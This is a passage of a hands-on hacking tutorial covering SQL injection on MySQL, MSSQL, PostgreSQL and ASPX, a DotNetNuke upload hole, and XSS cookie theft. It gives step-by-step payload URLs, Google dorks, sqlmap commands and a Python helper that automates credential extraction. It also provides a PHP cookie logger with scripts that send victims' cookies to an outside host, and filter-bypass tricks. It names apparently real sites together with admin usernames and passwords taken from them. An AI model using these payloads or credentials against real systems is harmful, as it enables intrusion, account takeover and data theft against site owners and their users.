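    Anything that is not a plain decimal integer is rejected before a query is built,
    and the value is passed as a parameter rather than spliced into the SQL text.
    """
    if not re.fullmatch(r"\d+", str(book_id), flags=re.ASCII):
        raise ValueError("id must be numeric")
    sql = "SELECT title FROM book WHERE id=?"
    return [row[0] for row in conn.execute(sql, (int(book_id),))]


# Payloads as the sections above spell them (MySQL's group_concat(a,0x3a,b) becomes
# group_concat(a||':'||b) in SQLite).
LOGIN_BYPASS = "password' or 1=1--"
BOOLEAN_CHECK = "141 and 1=2--"
UNION_DUMP = "-141 union select all group_concat(username||':'||password) from users--"


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "Admin", LOGIN_BYPASS))   # every username
    print(login_safe(db, "Admin", LOGIN_BYPASS))         # []
    print(book_vulnerable(db, BOOLEAN_CHECK))            # [] -> page content "disappears"
    print(book_vulnerable(db, UNION_DUMP))               # credential dump
    try:
        book_safe(db, UNION_DUMP)
    except ValueError as exc:
        print("rejected:", exc)
```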
SQL Injection - Load File :

You found a site with an SQL vulnerability, now you can try to access the table mysql.user and the file privileges. To see which user we are and whether we have user privileges, we add 'user' instead of a vulnerable column and at the end of the URL add '+from+mysql.user--'. It should look like this:

Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,user,4+from+mysql.user--

If you get a username, it means that you have access to the mysql.user table and you can continue with this tut.

Now to see if we have file privileges, instead of 'user' we add 'concat(user,0x3a,file_priv)' and of course '+from+mysql.user--'.

Now when the usernames and file privileges are listed on the page, you must find the username which was written at the start, when you were putting 'user' in the column. When you find it, if next to it shows 'Y' (which is Yes), you have privileges.

Load File:

All we have to do is to write load_file('FILE NAME') in the vulnerable column. We are going to try with /etc/passwd, so we type load_file('/etc/passwd') in the vulnerable column, which looks like this:

Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file('/etc/passwd'),4--

If it gives us an error we can convert the file name to Char or Hex, but if we do so we must delete the " ' " around the file name.

Hex e.g.

If we convert the file name to Hex, before the file name we add '0x'

Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file(0x2f6574632f706173737764),4+from+mysql.user--

Hex code '2f6574632f706173737764' stands for '/etc/passwd'. Recommended for Hex:

Code:
www.string-functions.com/string-hex.aspx

If you decide to convert the file name to Char then add 'load_file(char(converted file to char))', which looks like:

Code:
http://www.site.com/index.php?id=1+union+select+all+1,2,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),4--

Where '47,101,116,99,47,112,97,115,115,119,100' stands for '/etc/passwd'.

Char converter:

Code:
http://pookey.co.uk/binary.php
MSSQL Injection :

1) Finding the number of columns

I will use:

Code:
http://www.site.com/sr/page/member.asp?id=234

To find the column number we use the order by function. We add +order+by+5-- at the end of the link.

Code:
http://www.site.com/sr/page/member.asp?id=234+order+by+5--

So we get this error:

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 5 is out of range of the number of items in the select list.
/sr/page/member.asp, line 38

which means that there are fewer than 5 columns, let's try with 4. We get the same error, so we try with 3 and we get the next error:

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'order'.
/sr/page/member.asp, line 44

which means that there are 3 columns.

2) Finding the database version

To find the database version we use @@version.

Code:
http://www.site.com/sr/page/member.asp?id=-234+union+select+all+1,@@version,3--

and we get:

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.2 (Build 3790: Service Pack 2) ' to a column of data type int.
/sr/page/member.asp, line 38

and from here we can see the database version.

3) Finding table names

With MSSQL Injection it is not possible to get all tables at once, we must go 1 by 1.

Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,table_name,3+from+information_schema.tables--

and we get:

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Country' to a column of data type int.
/sr/page/member.asp, line 38

and we can see that we have a table called 'Country'. Now we have to find the other tables. We are going to use the not+in function. So we have the link:

Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,table_name,3+from+information_schema.tables+where+table_name+not+in('Country')--

and we get:

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Admin' to a column of data type int.
/sr/page/member.asp, line 38

and from here we can see that we have an Admin table.

4) Finding column names

It is the same for columns. We can not get all columns at once, so we have to do it 1 by 1. In this case we will use where+table_name='Admin'--. So we have the link:

Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,column_name,3+from+information_schema.columns+where+table_name='Admin'--

and we get the error:

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'USERNAME' to a column of data type int.
/sr/page/member.asp, line 38

From here we can see that we have the column USERNAME. Now we need the rest of the columns, so we use the not+in function again.

Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,column_name,3+from+information_schema.columns+where+table_name='Admin'+and+column_name+not+in('USERNAME')--

and we get:

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'PASSWD' to a column of data type int.
/sr/page/member.asp, line 38

So the column is PASSWD.

5) Taking data from columns

Now we put the column name instead of table_name, and after from we enter the name of the table.

Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,USERNAME,3+from+Admin--

We get the username OjuZwqAul. It is the same for the password:

Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,PASSWD,3+from+Admin--

We get the password M7sWt2!2uq.
Blind SQL Injection :

1) Blind SQL Injection?

The difference between SQL Injection and Blind SQL Injection is that Blind SQL Injection does not write out any errors, any table and column names or any column content. That is why it is called Blind SQL. You are just watching a part of the site disappear - image, text, etc. In Blind Injection we don't use -- or /* */.

2) Site vulnerability check

We have the link:

Code:
http://www.site.com/index.php?id=1

We add and 1=2:

Code:
http://www.site.com/index.php?id=1+and+1=2

If any part of the page disappears, it means that the site is vulnerable.

3) Finding the database version

As we said already, in this method nothing is going to be shown, so we say that the database version is 4. If part of the site disappears it means that the version is not 4, but if everything on the page stays as it should, the version is 4. We use the function @@version.

Code:
http://www.site.com/index.php?id=1+and+substring(@@version,1,1)=4

If the page loads as it should then the version is 4; if not, then we try:

Code:
http://www.site.com/index.php?id=1+and+substring(@@version,1,1)=5

4) MYSQL user

First we check whether we are able to use select, because it is blocked sometimes.

Code:
http://www.site.com/index.php?id=1+and+(select+1)=1

If the page loads normally we can use select, but if not then we can't use it. Now we check whether we have MYSQL user access.

Code:
http://www.site.com/index.php?id=1+and+(SELECT+*+from+mysql.user+limit+0,1)=1

Same as everything else: if the page loads normally we have access to mysql.user, if not then we don't. mysql.user is useful to get the password hash or to use load_file() and OUTFILE.

5) Finding table names

To find table names all we have to do is guess. First we find the table name, then the column name from the table. We have the link and we try to get the names of different tables. If the page loads normally it means that the table name is there and exists.

Code:
http://www.site.com/index.php?id=1+and+(select+1+from+ime_tabele+limit+0,1)=1

Our main objective is to find data from the admin table, so we can also use:

Code:
admin
administrator
member
login
members
adm
user
users
tbl_admin

6) Finding column names

Now that we found the name of the table we wanted, it is time to find the column names. We do the same as for the table. It is name matching: if the page loads normally then the column exists. We need login data, so commonly the columns are going to be:

Code:
username
admin
admin_username
uname
user
nick
password
pwrod
admin_password
pw
pass

The link that we use for columns is:

Code:
http://www.sajt.com/index.php?id=1+and+(select+substring(concat(1,ime_kolone),1,1)+from+ime_tabele+limit+0,1)=1

7) Taking data from columns

In the whole of Blind SQL this is going to be the most boring and longest part. Here we need an ASCII table.

Code:
http://www.asciitable.com/

We will look only at the DEC and CHR columns of the ASCII table. First we get the username, letter by letter. So we need to guess the DEC for some letter, e.g. for A it is 65. We have the link:

Code:
http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_name)+from+column_name+limit+0,1),1,1))>DEC

where DEC is the decimal number from the ASCII table. If the page loads normally we found a real letter of the username. To find the second letter change +limit+0,1 to +limit+1,1. So now we are guessing the second letter... It is the same for the password... So after a long, long time we get the username and password.

If there are more users and you want to get their passwords too, you have to add the where function. So it should look like:

Code:
http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_name)+from+column_name+where+column_name=something+limit+0,1),1,1))>DEC

To use where for the second column_name we usually use id, but we can also use other stuff, e.g. for id:

Code:
http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_name)+from+column_name+where+id=1+limit+0,1),1,1))>DEC

8) Taking data from columns using sqlmap

As you noticed already, you need a lot of time to get data from columns, so I would suggest you use sqlmap.

Download:

Code:
http://sqlmap.org/

Python download:

Code:
http://www.python.org/download/

Now we have to find the directory where sqlmap is located. Start > run > cmd and find the sqlmap directory using the cd command. The command to start sqlmap for getting data with Blind SQL Injection on Windows is:

Code:
sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name)"

NOTE: for unix put python before sqlmap.py. So it should look like:

Code:
python sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name)"

If there are more users, as I said, then use id:

Code:
sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name where id=1)"

After -u you put the link. After -p you put the parameter which is vulnerable (in our case id). -a we use for a random user agent from txt/user-agents.txt. -v1 is verbose. After --string we put something that sqlmap is going to recognize to know that it found a letter (some part of the text which disappears if the case is false). -e is the command that we want to execute, in our case this one:

Code:
SELECT concat(name_username_columns,0x3a,name_password_columns) from table_name where userid=1
Postgre SQL Injection :

1) Postgre SQL Injection?

Postgre SQL Injection is almost the same as SQL Injection. The difference is that the database is Postgre, not MySQL. It is a bit more complicated an attack than the usual SQL Injection. There are some other functions that we will use, as you will see.

2) Finding vulnerable sites

Finding a vulnerable site is the same as for the usual SQL Injection, which means that we can use Google dorks. Here are some:

Code:
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=

3) Site vulnerability check

You found a site that may be vulnerable. To check if the site is vulnerable we add ' at the end of the link.

Code:
http://www.link.com/page.php?page=1'

So if on the page we get:

Code:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at or near

or some part of the page disappears, then the site is vulnerable.

4) Finding the number of columns

So we know that the site is vulnerable, now we need to find the column number. We do it with the union function this time. Our link:

Code:
http://www.link.com/page.php?page=1+union+select+all+null--+-

If the page loads normally that means that there are more columns.

Code:
http://www.link.com/page.php?page=1+union+select+all+null,null,null,null from dual--

We keep adding null until we get an error. If we get an error with 7 nulls, it means that we have 6 columns, which means 6 nulls.

5) Finding vulnerable columns

It is just so easy to find a vulnerable column. Null = 0, which means that whatever you put instead of a certain null, if nothing happens it means that the column is not usable. That is how we find a vulnerable column. So:

Code:
http://www.link.com/page.php?page=1+union+select+all+current_database(),null,null,null--+-

If nothing is listed, it means that the column is not usable; we move on to the next one and put this one back to null.

6) Finding the database version

We do this with the version() function. The link will show us the version:

Code:
http://www.link.com/page.php?page=1+union+select+all+version(),null,null,null--+-

We will get something like:

Code:
PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit

7) Finding table names

Same as the usual SQL Injection, the only difference is that instead of a column number we have null. So it should look like:

Code:
http://www.link.com/page.php?page=1+union+select+all+table_name,null,null,null+from+information_schema.tables--+-

We will get the table names, and also the columns from the tables.

8) Finding column names

It is also easy, and there is no big difference. This is how it should look:

Code:
http://www.link.com/page.php?page=1+union+select+all+column_name,null,null,null+from+information_schema.columns+where+table_name=users--+-

Sometimes this won't work, so we need to convert = from ASCII to decimal. You can use this site:

Code:
http://easycalculation.com/ascii-hex.php

So we have the link:

Code:
http://www.link.com/page.php?page=1+union+select+all+column_name,null,null,null+from+information_schema.columns+where+table_name||CHR(61)||users--+-

9) Taking data from columns

Also almost the same as the usual SQL Injection:

Code:
http://www.link.com/page.php?page=1+union+select+all+username||CHR(58)||password+from+users--+-
    Error based PostgreSQL Injection : 1) Error based Postgre SQL Injection? Error based Postgre SQL Injection is type of web attack releated to Postgre SQL base. Difference is that you can get all tables, columns and values from columns etc. As title says attack is based on errors, and all results will be shown in errors. 2) Finding vulnerable sites Use Google dorks: Code: inurl:faq.php?id= inurl:event.php?id= inurl:index.php?id= 3) Site vulnerability check Add ' at end of link: Code: http://www.link.com/page.php?page=1' so if we get: Code: Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at or near site is vulnerable. 4) Finding database version Use version() function. In this type of attack query looks a bit complicated then usual SQL Injection so don't get confused. Code: http://www.link.com/page.php?page=1+and+1=cast(version()+as+int)-- If function is loaded successfully you will get this on page: Code: Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for integer: "PostgreSQL 9.0.4 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit" from where we get database version: Code:
  • 48.
    PostgreSQL 9.0.4 oni486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit 5) Finding table name As I said at start we are not able to get all tables in same time so we gonna use limit and offset functions. We will use offset to say which result from base we want to list. Our link: Code: http://www.link.com/page.php?page=1+and+1=cast((select+table_name+from+inform ation_schema.tables+limit+1+offset+0)+as+int)-- on page we will get this error: Code: Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for integer: "pg_type" from this we have table pg_type. to get next table we gonna change offset to 1: Code: http://www.link.com/page.php?page=1+and+1=cast((select+table_name+from+inform ation_schema.tables+limit+1+offset+1)+as+int)-- and we gonna get table like pg_attribute. 6) Finding column name First you have to do is to convert table name into decimal. We will use: Code: http://easycalculation.com/ascii-hex.php type string admin and you will get decimal code: Code: 97 100 109 105 110 We will change this code a bit, so it should look like this: Code: CHR(97)+||+CHR(100)+||+CHR(109)+||+CHR(105)+||+CHR(110) Now we will put it for table names and get columns. Code: http://www.link.com/page.php?page=1+and+1=cast((select+column_name+from+infor mation_schema.columns+w here+table_name=CHR(97)+||+CHR(100)+||+CHR(109)+||+CHR(105)+||+CHR(110)+limit +1 +offset+0)+as+int)--
and we get the column id. We keep changing the offset until the site sends us back to the home page (no error), which means there are no more columns in that table.

7) Taking data from columns

We found the columns username and password and now we want the data from them.
Code:
http://www.link.com/page.php?page=1+and+1=cast((select+username+||CHR(58)||+password+from+admin+limit+1+offset+0)+as+int)--
and we get this:
Code:
admin:21232f297a57a5a743894a0e4a801fc3
CHR(58) is the colon (:), which we use to get two columns at the same time. (That particular hash is the MD5 of "admin".)

NOTE (regarding the whole tutorial): from now on I'm not going to explain things in detail, because I think you should have figured it out by now. So I'm going to use pictures and code only.
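The offset loop above is mechanical, so here it is as a small Python driver. This is an added example, not code from the original tutorial: it builds the cast()-to-int payloads, encodes string constants as CHR()||CHR()... so no quotes are needed, reads the value back out of the pg_query() warning, and walks LIMIT 1 OFFSET n until the page stops erroring. The target page, its database contents and the fake_fetch() responder are constructed for the example; against a real site you would replace fake_fetch with an HTTP GET of to_url(base, payload). The same driver shape (one row per error, advance the cursor) also fits the MSSQL convert(int, ...) technique in the next section, where the cursor is a growing not in (...) list instead of an offset.

```python
"""Error based PostgreSQL injection helper: cast()-to-int payloads, CHR() encoding,
and a row-by-row extraction loop driven by the page's error text."""
import re
from typing import Callable, List, Optional
from urllib.parse import quote_plus

# What a vulnerable page prints when PostgreSQL refuses to cast text to int
# (newer versions say "for type integer", older ones just "for integer").
PG_CAST_ERROR = re.compile(r'invalid input syntax for (?:type )?integer: "([^"]*)"')


def chr_encode(text: str) -> str:
    """Turn 'admin' into CHR(97)||CHR(100)||... so the payload needs no quote characters."""
    return "||".join(f"CHR({ord(c)})" for c in text)


def cast_payload(subquery: str) -> str:
    """The cast trick: the scalar subquery's text value ends up in the error message."""
    return f"1 and 1=cast(({subquery}) as int)--"


def to_url(base: str, payload: str) -> str:
    """page.php?page=<payload>, URL encoded the way the tutorial shows it (+ for space)."""
    return base + quote_plus(payload)


def parse_pg_error(body: str) -> Optional[str]:
    """Extract the quoted value from the pg_query() warning, or None if there is no error."""
    m = PG_CAST_ERROR.search(body)
    return m.group(1) if m else None


def dump_rows(fetch: Callable[[str], str], select: str, max_rows: int = 200) -> List[str]:
    """Walk a result set one row at a time with LIMIT 1 OFFSET n; the first offset
    that produces no error means there are no more rows."""
    rows: List[str] = []
    for offset in range(max_rows):
        value = parse_pg_error(fetch(cast_payload(f"{select} limit 1 offset {offset}")))
        if value is None:
            break
        rows.append(value)
    return rows


def dump_columns(fetch: Callable[[str], str], table: str) -> List[str]:
    return dump_rows(fetch, "select column_name from information_schema.columns "
                            f"where table_name={chr_encode(table)}")


def dump_credentials(fetch: Callable[[str], str], table: str, user_col: str, pass_col: str) -> List[str]:
    return dump_rows(fetch, f"select {user_col}||CHR(58)||{pass_col} from {table}")


# --- constructed stand-in for the vulnerable page (no network, no real site) ---
CONSTRUCTED_DB = {
    "select column_name from information_schema.columns where table_name="
    + chr_encode("admin"): ["id", "username", "password"],
    "select username||CHR(58)||password from admin": ["admin:21232f297a57a5a743894a0e4a801fc3"],
}


def fake_fetch(payload: str) -> str:
    """Mimics page.php: prints the pg_query() warning when the cast() payload hits a
    real row, otherwise renders the normal home page (no error)."""
    m = re.fullmatch(r"1 and 1=cast\(\((.*) limit 1 offset (\d+)\) as int\)--", payload)
    if not m:
        return "<html>home page</html>"
    rows = CONSTRUCTED_DB.get(m.group(1), [])
    n = int(m.group(2))
    if n >= len(rows):
        return "<html>home page</html>"
    return ('Warning: pg_query() [function.pg-query]: Query failed: ERROR: '
            f'invalid input syntax for integer: "{rows[n]}"')


if __name__ == "__main__":
    print(dump_columns(fake_fetch, "admin"))
    print(dump_credentials(fake_fetch, "admin", "username", "password"))
```

max_rows is a safety stop so a page that errors on every request (for instance a WAF error page that happens to match) cannot loop forever; when you hit it, look at the raw response before trusting the output.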
SQL Injection on ASPX :

1) Site vulnerability check

Vulnerable link:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton
We add order by 1--:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton order by 1--
If you get a page error, go to:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535

2) Finding column name

Go to:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 having 1=1
MSSQL complains that a column in the select list is invalid because it is not contained in an aggregate function or GROUP BY clause, and names that column in the error.

3) Finding table name

Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 table_name from information_schema.tables))
MSSQL cannot convert the table name to int and prints it in the conversion error, one name per query. We want the admin table, so we exclude every name we have already seen with not in:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Tab_FinalOrder')))
The admin table name is AdminMaster.

4) Finding columns in admin table
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name = 'AdminMaster'))
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name = 'AdminMaster' and column_name not in ('Admin_name')))
Column names:

5) Finding username and password

Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 Admin_name from AdminMaster))
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 Admin_password from AdminMaster))
Code:
Username: admin
Password: pothys!@#
Dot net nuke:

DNN (DotNetNuke) is an ASP.NET CMS. Its FCKeditor link gallery page lets you upload files to the site and keep them there like an "online gallery" of pictures. That gallery has a hole in it, so you can use it to upload files to the site with these extensions: *.gif, *.jpg, *.pdf, *.txt, *.swf...
Google dork to find vulnerable sites:
Code:
inurl:fck/fcklinkgallery.aspx
I'm going to use this site:
Code:
http://kellyballancephotography.com/providers/htmleditorproviders/fck/fcklinkgallery.aspx
If the page loads, it will look like this:
which means that we can continue. Now we choose option 3 -> File (A File On Your Site) and we type this JavaScript into the address bar to make the upload form appear:
Code:
javascript:__doPostBack('ctlURL$cmdUpload','')
A Choose File field and an Upload Selected File button will show up.
*on this site the text colour matches the background, so you will have to select the whole page (CTRL+A) to see the upload button.
Upload the file and access it at sitelink.com/portals/0/filename.extension ->
Code:
http://kellyballancephotography.com/portals/0/config.txt
XSS :

1) XSS?

XSS is short for Cross Site Scripting. It lets an attacker execute JavaScript in other users' browsers, in the context of the vulnerable site. You can use XSS in many ways: simply executing JavaScript commands, or stealing cookies. Here we inject the stolen cookie into our own browser so we can log in somewhere without a password.

2) Required stuff

Mozilla Firefox:
Code:
http://www.mozilla.org/en-US/products/download.html?product=firefox-3.0.5&os=win&lang=en-GB
Add-on Firebug:
Code:
https://addons.mozilla.org/en-US/firefox/addon/firebug/
Add-on FireCookie:
Code:
https://addons.mozilla.org/en-US/firefox/addon/firecookie/
Add-on Live HTTP Headers:
Code:
https://addons.mozilla.org/en-US/firefox/downloads/file/28118/live_http_headers-0.14-fx+sm.xpi
It is recommended to have basic knowledge of JavaScript.

3) Testing XSS vulnerability

Sites where we can use this method are sites with a text input and a submit button, and sites where a GET parameter is printed back into the page.
e.g. of the GET method:
Code:
www.site.com/index.php?page=<script>alert("XSS")</script>
The command to check site vulnerability is:
Code:
<script>alert("XSS")</script>
Now I will explain what this command does:
<script> - opening script tag
alert("XSS") - a window pops up saying "XSS"
</script> - closing script tag

4) XSS types (what XSS is used for)

Cookie Stealing - we steal the cookie of some user (commonly the admin) and put it into our own browser, so when we open the site we are already logged in.
Cross-Site Request Forgery - we make the victim's browser send requests (commands) on our behalf, without knowing the victim's username or password.
XSS Worms - an "evil" script that can spread over the whole site, because it writes itself into every page or profile it touches.
Door-Forwarding - the script creates an iframe that runs an exploit or starts downloading a virus, RAT, keylogger, istealer, etc.
Keylogging - you know what keylogging is.

5) Cookie Stealing

For cookie stealing we will need:
- a vulnerable site
- a web host for the scripts
- a PHP script
Put this script on some hosting: cookie.php
Code:
<?php
// Cookie logger: appends whatever arrives in ?cookie= to a text file.
$cookie = $_GET["cookie"];          // $HTTP_GET_VARS is deprecated and gone since PHP 5.4
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n");
fclose($file);
?>
Script execution (any of these works):
Code:
<script>document.location="http://www.link.com/cookie.php?cookie=" + document.cookie;</script>
or
<script>location.href="http://www.link.com/cookie.php?cookie=" + document.cookie;</script>
or
<script>window.open('http://www.link.com/cookie.php?cookie=' + document.cookie);</script>
or
<script>window.location='http://www.link.com/cookie.php?cookie=' + document.cookie;</script>
Note that cookies flagged HttpOnly are not visible to document.cookie, so this only works when the session cookie lacks that flag.
How does this work?
When a user opens the page carrying your cookie logger payload, his cookie is saved to cookielog.txt. Then we take the cookie and use it. Here is how:
1) Open Mozilla Firefox
2) Open the Firebug add-on (with FireCookie installed you get a Cookies tab)
3) Type the cookie name and value. Here is one:
Code:
PHPSESSID=db3e4e100ab6bb912de1b80c4eed7898
From this cookie the name is PHPSESSID and the value is db3e4e100ab6bb912de1b80c4eed7898.

6) Filter bypassing

1) Deleting script tags
e.g. if we type <script>alert("XSS")</script> and the page outputs only alert("XSS"), the filter deleted the tags <script> and </script>.
Here is how to bypass that protection, when the filter strips the tag only once (not recursively):
Instead of <script>alert("XSS")</script> we send <scr<script>ipt>alert("XSS")</scr</script>ipt>
After the filter removes the inner <script> and </script>, the remaining pieces join back into <script>alert("XSS")</script>.

2) magic_quotes
Explained here:
Code:
http://en.wikipedia.org/wiki/Magic_quotes
If you type <script>alert("XSS")</script> and it prints <script>alert(\"XSS\")</script> (the quotes come back escaped with a backslash), magic_quotes_gpc is on. It is a bit harder to bypass, because we cannot use quotes at all. The way around it is String.fromCharCode, which builds a string from integer character codes, so no quotes are needed. Here is an example.
This is the link of our cookie logger: http://link.com/cookie.php
We would turn
<script>location.href="http://www.link.com/cookie.php?cookie=" + document.cookie;</script>
into:
Code:
<scr<script>ipt>location.href=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,108,105,110,107,46,99,111,109,47,99,111,111,107,105,101,46,112,104,112,63,99,111,111,107,105,101,61)+document.cookie;</scr</script>ipt>
The numbers are the decimal ASCII codes of http://www.link.com/cookie.php?cookie= and, since they are integers, no ' or " is needed. We converted the text with this tool:
Code:
Ascii to Decimal http://pookey.co.uk/binary.php

6) Bypass XSS Filters

[1] Types of filters:
[+] Bypass magic_quotes_gpc (if it's on)
[+] Bypass with encoding in full HTML (URL encoding)
[+] Bypass with obfuscation
[+] Bypass with the "closing the field" method

[+] Bypass magic_quotes_gpc
When magic_quotes_gpc is on, the server escapes ", \ and ' with a backslash (it depends), so they cannot be used directly
To bypass it we use String.fromCharCode(). We write our code inside the () as ASCII codes, example:
String.fromCharCode(107, 51, 110, 122, 48)
(Here I encoded k3nz0 in ASCII: 107, 51, 110, 122, 48.)
And we use it:
<script>alert(String.fromCharCode(107, 51, 110, 122, 48))</script>
We will see an alert box with: k3nz0
We bypassed magic_quotes_gpc :)

[+] Bypass with encoding in full HTML:
Very simple: we URL encode (percent encode) our whole code.
Our code: <script>alert('i am here')</script>
URL encoded:
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%69%20%61%6D%20%68%65%72%65%27%29%3C%2F%73%63%72%69%70%74%3E
Now you can inject it :) ! Notice that you can use the tool "Coder" to do the encoding. This only helps when the filter looks at the raw, still encoded, parameter; a filter that runs after URL decoding sees the plain <script> again.
We bypassed the filter.

[+] Bypass with Obfuscation:
Very simple too: this filter does not allow for example these words:
-script
-alert
To bypass it you mix the case, for example "sCriPt" instead of "script". HTML tag names are case insensitive, so <ScriPt>...</scriPt> still runs. JavaScript identifiers are case sensitive, though, so "ALeRt" would not call alert(); a blacklisted function name needs a different trick (building the name from pieces, or the String.fromCharCode encoding above). Example:
<ScriPt>alert("i am here")</scriPt>
We bypassed the filter.

[+] Bypass with the "closing the field" method:
Generally in search scripts: we just add "> at the beginning to close the current attribute and tag, example:
http://target.com/search.php?search="><script>alert("hello")</script>
7) XSSER Framework

Download: http://sourceforge.net/projects/xsser/

Usage: xsser [OPTIONS] [-u |-i |-d ] [-g |-p |-c ] [Request(s)] [Vector(s)] [Bypasser(s)] [Technique(s)] [Final Injection(s)]

Options:
--version show program's version number and exit
-h, --help show this help message and exit
-s, --statistics show advanced statistics output results
-v, --verbose verbose (default: no)
--gtk launch XSSer GTK Interface

*Special Features*:
You can choose Vector(s) and Bypasser(s) to inject code with these extra special features:
--imx=IMX create a false image with XSS code embedded
--fla=FLASH create a false .swf file with XSS code embedded

*Select Target(s)*:
At least one of these options has to be specified to set the source to get target(s) urls from. You need to choose to run XSSer:
-u URL, --url=URL Enter target(s) to audit
-i READFILE Read target URLs from a file
-d DORK Process search engine dork results as target urls
--De=DORK_ENGINE Search engine to use for dorking (bing, altavista, yahoo, baidu, yandex, youdao, webcrawler, ask, etc. See dork.py file to check for available engines)

*Select type of HTTP/HTTPS Connection(s)*:
These options can be used to specify which parameter(s) we want to use as payload to inject code.
-g GETDATA Enter payload to audit using GET. (ex: '/menu.php?q=')
-p POSTDATA Enter payload to audit using POST. (ex: 'foo=1&bar=')
-c CRAWLING Number of urls to crawl on target(s): 1-99999
--Cw=CRAWLING_WIDTH Deeping level of crawler: 1-5
--Cl Crawl only local target(s) urls (default TRUE)

*Configure Request(s)*:
These options can be used to specify how to connect to target(s) payload(s). You can select multiple:
--cookie=COOKIE Change your HTTP Cookie header
--user-agent=AGENT Change your HTTP User-Agent header (default SPOOFED)
--referer=REFERER Use another HTTP Referer header (default NONE)
--headers=HEADERS Extra HTTP headers newline separated
--auth-type=ATYPE HTTP Authentication type (value Basic or Digest)
--auth-cred=ACRED HTTP Authentication credentials (value name:password)
--proxy=PROXY Use proxy server (tor: http://localhost:8118)
--timeout=TIMEOUT Select your Timeout (default 30)
--delay=DELAY Delay in seconds between each HTTP request (default 8)
--threads=THREADS Maximum number of concurrent HTTP requests (default 5)
--retries=RETRIES Retries when the connection timeouts (default 3)

*Select Vector(s)*:
These options can be used to specify a XSS vector source code to inject in each payload. Important, if you don't want to try to inject a common XSS vector, used by default. Choose only one option:
--payload=SCRIPT OWN - Insert your XSS construction -manually-
--auto AUTO - Insert XSSer 'reported' vectors from file

*Select Bypasser(s)*:
These options can be used to encode selected vector(s) to try to bypass all possible anti-XSS filters on target(s) code and some IPS rules, if the target uses them. Also, can be combined with other techniques to provide encoding:
--Str Use method String.FromCharCode()
--Une Use function Unescape()
--Mix Mix String.FromCharCode() and Unescape()
--Dec Use Decimal encoding
--Hex Use Hexadecimal encoding
--Hes Use Hexadecimal encoding, with semicolons
--Dwo Encode vectors IP addresses in DWORD
--Doo Encode vectors IP addresses in Octal
--Cem Try -manually- different Character Encoding mutations (reverse obfuscation: good) -> (ex:'Mix,Une,Str,Hex')

*Special Technique(s)*:
These options can be used to try to inject code using different types of XSS techniques. You can select multiple:
--Coo COO - Cross Site Scripting Cookie injection
